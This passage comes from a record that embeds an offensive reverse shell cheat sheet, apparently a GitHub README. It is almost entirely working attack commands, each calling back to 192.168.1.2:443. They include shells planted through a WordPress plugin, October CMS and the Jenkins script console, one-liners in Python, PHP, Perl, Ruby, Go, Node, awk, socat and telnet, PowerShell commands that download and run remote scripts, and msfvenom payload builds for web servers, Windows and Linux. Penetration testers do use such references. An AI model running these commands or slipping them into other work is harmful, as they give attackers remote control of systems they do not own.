/bin/sh\");\n?\u003e\n```\n\n\u003ckbd\u003eCompress\u003c/kbd\u003e\n\n```sh\nzip plugin.zip plugin.php\n```\n\n\u003ckbd\u003eSteps\u003c/kbd\u003e\n\n* Plugins\n\n* Add New\n\n* Upload Plugin\n\n* Install Now\n\n* Activate Plugin\n\n---\n\n# \u003ckbd\u003eOctober\u003c/kbd\u003e\n\n```cmd\nfunction onstart(){\n  
exec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\");\n}\n```\n\n---\n\n# \u003ckbd\u003eJenkins\u003c/kbd\u003e\n\n# \u003ckbd\u003eJenkins Windows\u003c/kbd\u003e\n\n\u003ckbd\u003eNetcat (Method 1)\u003c/kbd\u003e\n\n```cmd\ncmd = \"\\\\\\\\192.168.1.2\\\\a\\\\nc.exe -e cmd 192.168.1.2 443\"\ncmd.execute().text\n```\n\n\u003ckbd\u003eNetcat (Method 2)\u003c/kbd\u003e\n\n```cmd\nprintln \"\\\\\\\\192.168.1.2\\\\a\\\\nc.exe -e cmd 192.168.1.2 443\" .execute().text\n```\n\n\u003ckbd\u003eCMD\u003c/kbd\u003e\n\n```cmd\nString host=\"192.168.1.2\";\nint port=443;\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u003e0)so.write(pi.read());while(pe.available()\u003e0)so.write(pe.read());while(si.available()\u003e0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n```\n\n\u003ckbd\u003ePowerShell\u003c/kbd\u003e\n\n```cmd\ncommand = \"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')\"\nprintln(command.execute().text)\n```\n\n# \u003ckbd\u003eJenkins Linux\u003c/kbd\u003e\n\n\u003ckbd\u003eNetcat (Method 1)\u003c/kbd\u003e\n\n```cmd\ncmd = \"nc -e /bin/sh 192.168.1.10 443\"\ncmd.execute().text\n```\n\u003ckbd\u003eNetcat (Method 2)\u003c/kbd\u003e\n\n```cmd\n\"nc -e /bin/sh 192.168.1.2 443\".execute().text\n```\n\n\u003ckbd\u003eBash\u003c/kbd\u003e\n\n```cmd\nString host=\"192.168.1.2\";\nint port=443;\nString cmd=\"bash\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream 
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u003e0)so.write(pi.read());while(pe.available()\u003e0)so.write(pe.read());while(si.available()\u003e0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n```\n\n---\n\n# \u003ckbd\u003ePerl\u003c/kbd\u003e\n\n```cmd\nperl -e 'use Socket;$i=\"192.168.1.2\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n```\n\n---\n\n# \u003ckbd\u003ePython\u003c/kbd\u003e\n\n\u003ckbd\u003eSh\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'\n```\n\n\u003ckbd\u003eBash\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n```\n\n```cmd\nexport 
RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n```\n\n---\n\n# \u003ckbd\u003ePython3\u003c/kbd\u003e\n\n\u003ckbd\u003eSh\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'\n```\n\n\u003ckbd\u003eBash\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) 
for fd in (0,1,2)];pty.spawn(\"bash\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n```\n\n---\n\n# \u003ckbd\u003ePHP\u003c/kbd\u003e\n\n```php\n\u003c?php exec(\"nc -e /bin/sh 192.168.1.2 443\"); ?\u003e\n```\n\n```bash\n\u003c?php exec(\"curl 192.168.1.2|sh\"); ?\u003e\n\u003c?php exec(\"wget -qO- 192.168.1.2|sh\"); ?\u003e\n```\n\n```php\n\u003c?php passthru(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\"); ?\u003e\n```\n\n```php\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);`/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263`;'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);system(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);passthru(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);popen(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\", \"r\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);shell_exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);$proc=proc_open(\"/bin/sh -i\", array(0=\u003e$sock, 1=\u003e$sock, 
2=\u003e$sock),$pipes);'\n```\n\n---\n\n# \u003ckbd\u003eRuby\u003c/kbd\u003e\n\n```cmd\nruby -rsocket -e'f=TCPSocket.open(\"192.168.1.2\",443).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d 2\u003e\u0026%d\",f,f,f)'\nruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.1.2\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\nruby -rsocket -e 'c=TCPSocket.new(\"192.168.1.2\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n```\n\n---\n\n# \u003ckbd\u003eXterm\u003c/kbd\u003e\n\n```cmd\nxterm -display 192.168.1.2:443\n```\n\n---\n\n# \u003ckbd\u003eNcat\u003c/kbd\u003e\n\n\u003ckbd\u003eTCP\u003c/kbd\u003e\n\n```cmd\nncat 192.168.1.2 443 -e /bin/sh\nncat 192.168.1.2 443 -e /bin/bash\n```\n\n\u003ckbd\u003eUDP\u003c/kbd\u003e\n\n```cmd\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u003e\u00261|ncat -u 192.168.1.2 443 \u003e/tmp/f\n```\n\n---\n\n# \u003ckbd\u003eSocat\u003c/kbd\u003e\n\n```cmd\nsocat TCP:192.168.1.2:443 EXEC:sh\n```\n```cmd\nsocat TCP:192.168.1.2:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane\n```\n\n---\n\n# \u003ckbd\u003ePowerShell\u003c/kbd\u003e\n\n```powershell\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"192.168.1.2\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"\u003e \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n```\n```powershell\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName 
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '\u003e ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n```\n```powershell\npowershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')\n```\n```powershell\nC:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.2/shell.ps1')\n```\n```powershell\npowershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/powercat.ps1');powercat -c 192.168.1.2 -p 443 -e cmd\"\n```\n\n---\n\n# \u003ckbd\u003eAwk\u003c/kbd\u003e\n\n```cmd\nawk 'BEGIN {s = \"/inet/tcp/0/192.168.1.2/443\"; while(42) { do{ printf \"shell\u003e\" |\u0026 s; s |\u0026 getline c; if(c){ while ((c |\u0026 getline) \u003e 0) print $0 |\u0026 s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n```\n\n---\n\n# \u003ckbd\u003eGawk\u003c/kbd\u003e\n\n```cmd\ngawk 'BEGIN {P=443;S=\"\u003e \";H=\"192.168.1.2\";V=\"/inet/tcp/0/\"H\"/\"P;while(1){do{printf S|\u0026V;V|\u0026getline c;if(c){while((c|\u0026getline)\u003e0)print $0|\u0026V;close(c)}}while(c!=\"exit\")close(V)}}'\n```\n\n---\n\n# \u003ckbd\u003eGolang\u003c/kbd\u003e\n\n```cmd\necho 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"192.168.1.2:443\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c cmd.Run()}' \u003e /tmp/t.go \u0026\u0026 go run /tmp/t.go \u0026\u0026 rm /tmp/t.go\n```\n\n---\n\n# \u003ckbd\u003eTelnet\u003c/kbd\u003e\n\n```cmd\nrm -f /tmp/p; mknod /tmp/p p \u0026\u0026 telnet 192.168.1.2 443 0/tmp/p\n```\n```cmd\ntelnet 192.168.1.2 80 | /bin/bash | telnet 192.168.1.2 443\n```\n```cmd\nmknod a p \u0026\u0026 telnet 192.168.1.2 443 0\u003ca | /bin/sh 1\u003ea\n```\n```cmd\nTF=$(mktemp -u);mkfifo $TF 
\u0026\u0026 telnet 192.168.1.2 443 0\u003c$TF | sh 1\u003e$TF\n```\n\n---\n\n# \u003ckbd\u003eJava\u003c/kbd\u003e\n\n```cmd\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/192.168.1.2/443;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[])\np.waitFor()\n```\n\n---\n\n# \u003ckbd\u003eNode\u003c/kbd\u003e\n\n```cmd\nrequire('child_process').exec('bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261');\n```\n\n---\n\n# \u003ckbd\u003eMsfvenom\u003c/kbd\u003e\n\n# \u003ckbd\u003eWeb Payloads\u003c/kbd\u003e\n\n# \u003ckbd\u003ePHP Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw \u003e reverse.php\n```\n\n```cmd\nmsfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw \u003e reverse.php\n```\n\n# \u003ckbd\u003eWar Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war \u003e reverse.war\n```\n\n# \u003ckbd\u003eJAR Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar \u003e reverse.jar\n```\n\n# \u003ckbd\u003eJSP Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw \u003e reverse.jsp\n```\n\n# \u003ckbd\u003eASPX Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx\nmsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx\n```\n\n---\n\n# \u003ckbd\u003eWindows Payloads\u003c/kbd\u003e\n\n# \u003ckbd\u003eWindows Listener Netcat\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n\u003ckbd\u003ex64 - 
Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n# \u003ckbd\u003eWindows Listener Metasploit Multi Handler\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n\u003ckbd\u003ex64 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n   \n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n---\n\n# \u003ckbd\u003eLinux Payloads\u003c/kbd\u003e\n \n# \u003ckbd\u003eLinux Listener Netcat\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n \n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n---\n\n# \u003ckbd\u003eLinux Listener Metasploit Multi Handler\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n\u003ckbd\u003ex64 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf 
\u003e reverse.elf\n```\n\n---\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4t4s3c%2FOffensiveReverseShellCheatSheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd4t4s3c%2FOffensiveReverseShellCheatSheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4t4s3c%2FOffensiveReverseShellCheatSheet/lists"}